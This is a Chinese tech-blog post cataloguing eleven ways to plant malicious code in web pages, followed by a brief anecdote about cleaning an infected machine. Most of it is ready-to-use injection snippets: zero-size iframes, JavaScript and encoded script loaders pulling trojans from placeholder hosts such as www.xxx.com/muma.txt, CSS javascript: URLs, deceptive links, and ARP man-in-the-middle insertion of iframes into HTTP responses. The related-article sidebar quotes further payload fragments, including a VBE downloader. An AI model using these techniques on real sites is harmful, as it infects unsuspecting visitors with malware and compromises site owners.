挂马方法简介

最新推荐文章于 2020-09-09 19:50:15 发布
最新推荐文章于 2020-09-09 19:50:15 发布
阅读量2.4k 收藏 6
点赞数 1
分类专栏: Network Security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiayanhui2877/article/details/8227945
版权

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

此处地址会直接访问,所以如果是链接到exe文件的下载地址,那就会提示用户下载,用户一旦点击就会下载执行被挂马。

二:js文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马

<bodyοnlοad="window.location='地址';"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML +'\r\n

<iframesrc="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

body {
background-image:url('javascript:document.write("<scriptsrc=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

<SCRIPT language=javascript>
window.open("地址","","toolbar=no,location=no,directories=no,status=no,

menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0width=0></iframe>
<imgsrc="图片地址"></center>
</html>

九:伪装调用:

<frameset rows="444,0"cols="*">
<frame src="打开网页" framborder="no" scrolling="auto"noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no"noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href=http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)

onMouseOver="www_163_com(); return true;">页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,

menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一: 超级网马—通过arp欺骗来直接挂马

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

如何处理网页木马:

1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm

2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...

3、修改键值wm.htm为wm_nnd.htm。

4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
cain.exe,据说是密码嗅探器。

5、修改键值cain.exe为cain_nnd.exe。

6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。

7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。

8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用netstart,查看可疑程序

9、发现temp*.exe(全名记不清了),立马net stop server 。

10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

12、观察了几天,没再发生挂马的现象。


Walter_Jia
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
挂马方法和技巧详解
北冥
03-28 1781
(1) HTML挂马法。   常规的HTML挂马方法一般是在网页中插入一条iframe语句,像。查看站点是否被挂,一般是查找一下关键词iframe。(2) 再隐藏一点的就是js挂马了。  像再原来的网页中写入 ,horse里的js写法一般为 document.write(’http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.b
教你如何挂马
chenrongde的专栏
10-09 2032
教你如何挂马方法一: 一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 : 把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm也就是我门的网页木马了,那width="0" height
正确的4种挂马方式(属于比较简单的)
海阔天空
03-18 1534
一、最简单的也是最有效的 二、js挂马 三、js变形加密 muma.txt可改成任意后缀的。 四、不是嵌入了与iframe不同 top.document.body.innerHTML = top.document.body.innerHTML + '/r/n''
黑客挂马的各种方法
瞎几把学
08-21 721
黑客挂马的各种方法 一般黑客挂马的代码都是   这样的 其实还有很多挂马代码下面全面介绍下一:框架挂马   二:js文件挂马      首先将以下代码   document.write("");   保存为xxx.js,   则JS挂马代码为   三:js变形加密         muma.txt可改成任意后缀四:body挂马五:隐蔽挂马top.doc
挂马大全
The_IT_Crowd的专栏
06-17 1896
转载请注明出处:孤水绕城   对于挂马大家肯定都不会陌生,关于如何跨站如何挂马的东东早已不再是什么高深的技术,即便是菜鸟一个也能玩的很熟练,不需要很高深的技术,对于挂马的技术现在公布的也无非也就那么几种。 一:框架挂马 二:js文件挂马  首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密  m
基于HTTP会话过程跟踪的网页挂马攻击检测方法.ppt
06-20
基于HTTP会话过程跟踪的网页挂马攻击检测方法
预防网页挂马方法总结
09-01
以下是对预防网页挂马的详细方法的解析: 1. **理解网页挂马的工作原理**: - **目的**:黑客的目标是将木马植入用户的电脑,并使其执行,形成恶性循环,从而控制用户的设备。 - **实现方式**:常见手法是在网页...
详解网站挂马方法
11-21
详解网站挂马方法/教会你如何渗透网站挂马,抓肉鸡等
wordpress网站被挂马以及防御方法
09-28
wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性
百度被挂马 是真是假
u011282129的专栏
07-26 516
最近有不少站长反应,装有百度统计代码的网站最近总是莫名其妙的弹窗口,后经过百度技术排查,确定系第三方机构利用技术手段劫持了统计代码,话说统计部门还是敢担当的。实例如下图所示: JS代码里植入了第三方代码,最近百度统计错误不断,麻烦不断,部分需要精准报告的用户已经转向了别的工具了。 百度统计团队发表郑重声明: 最近收到反馈,统计代码有弹出广告现象,经过技术团队排查,确定系第
挂马攻击的介绍和防御
煜铭2011
10-08 2777
0x01 介绍 挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。 0x02 方式 目前挂马的主要方式是通过IFrame与Scr...
网站挂马方式
weixin_34112900的博客
12-01 117
网页挂马指的是把一个***程序上传到一个网站里面然后用***生成器生一个网马,再上到空间里面!再加代码使得***在打开网页是运行。网页挂马方法多种多样。 现在很多网站都被挂上了马,身为站长,恐怕是最怕的问题,一旦事发,影响用户是小,一旦被google贴上此网站可能有病毒的标签,恐怕会给网站带来很大的损失,下面就对一些常用的挂马方式做下分析 一:iframe挂马 ...
怎样实现后台木马
下下签的专栏--璇玑玉衡
04-13 3703
        以前一直觉得像灰鸽子、黑洞之类的木马很神秘,很厉害。自己也想学学,刚好前段时间我一个导师布置了个课题研究木马防范技术。当然要防住木马这种东西总得了解别人的原理吧,无奈之中只好自己写个木马了。        若干日后。。。。。        其实木马这东西还真他#$简单,说穿了就是一个底层的TCP/IP通信而已。所谓木马的好坏,不外乎是指谁的隐藏做的好,谁实现的功能多少而已。
安卓挂马代码
xyang
06-23 968
function getContext(){ var obj, jsInterface, r; for (var obj in window) { try { if ("getClass" in window[ obj ]) { try{ jsInterface = window[ obj ]; }catch(e){ } } } catch(e) { } } if( !
网页挂马及暗链检测
A11085013的专栏
06-09 7846
什么是网页挂马 网页挂马是指恶意攻击者攻击WEB网站后,在网页中嵌入一段代码或脚本,用于自动下载带有特定目的木马程序,而恶意攻击者实施恶意代码或脚本植入的行为通常称为“挂马”。 什么是SEO暗链 SEO暗链是SEO黑帽手法中相当普遍的一种手段。笼统地说,它就是指一些人用非正常的手段获取其他网站的权限后,修改其网站的源代码,加入指向自己网站的反向链接代码。其目的是优化自己网站中的一些关键字
3种脚本挂马方式(SHELL中使用)
|独自望海。。。
09-13 1180
这个方法也是很简单有效的,我们在得到的肉鸡SHELL里依次写入下面这些命令来创建一个VBE文件,代码如下:echo with w:if .arguments.count^xiazai.vbeecho set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbeecho web
计算机网络——计算机网络病毒和黑客
WallisEdward的博客
09-09 5111
计算机网络病毒的分类 (1)系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般共有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。 (2)蠕虫病毒的前缀是:Worm。自包含程序,它能传播自身功能的拷贝或自身的某些部分到其他计算机系统中。这种病毒的共有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。 (3)脚本病毒的前缀是:Script。脚本病毒的共有特性是使用脚本语言编写,通过网页
挂马方法大全
ccx_john的专栏
12-07 2535
一:框架挂马 二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀 四:body挂马 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + '
网络安全---------arp挂马攻击
Mr_Effiya的博客
11-20 774
原理:arp中间人攻击,实际上相当于做了一次代理。  正常时候: A----&gt;B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机  arp中间人攻击时候: A----&gt;C----&gt;B  B----&gt;C----&gt;A  实际上,C在这里做了一次代理的作用  那 么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时...
网页挂马的原理和实现方式
weixin_33670786的博客
11-21 4881
网页挂马 一、网页挂马介绍 (1)、挂马与网马 1、挂马 Ø从“挂马”这个词中就知道,它和“木马”脱离不了关系,的确,挂马的目的就是将木马传播出去 Ø黑客入侵了一些网站之后,将自己编定的网页木马嵌入到其网站的页面(能常是在网站主页)中,利用该网站的流量将自己的网页木马传播出去从页达到自己的目的 2、网马 Ø网马,即“网页木马”,就是将木马和网页结合在一起...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值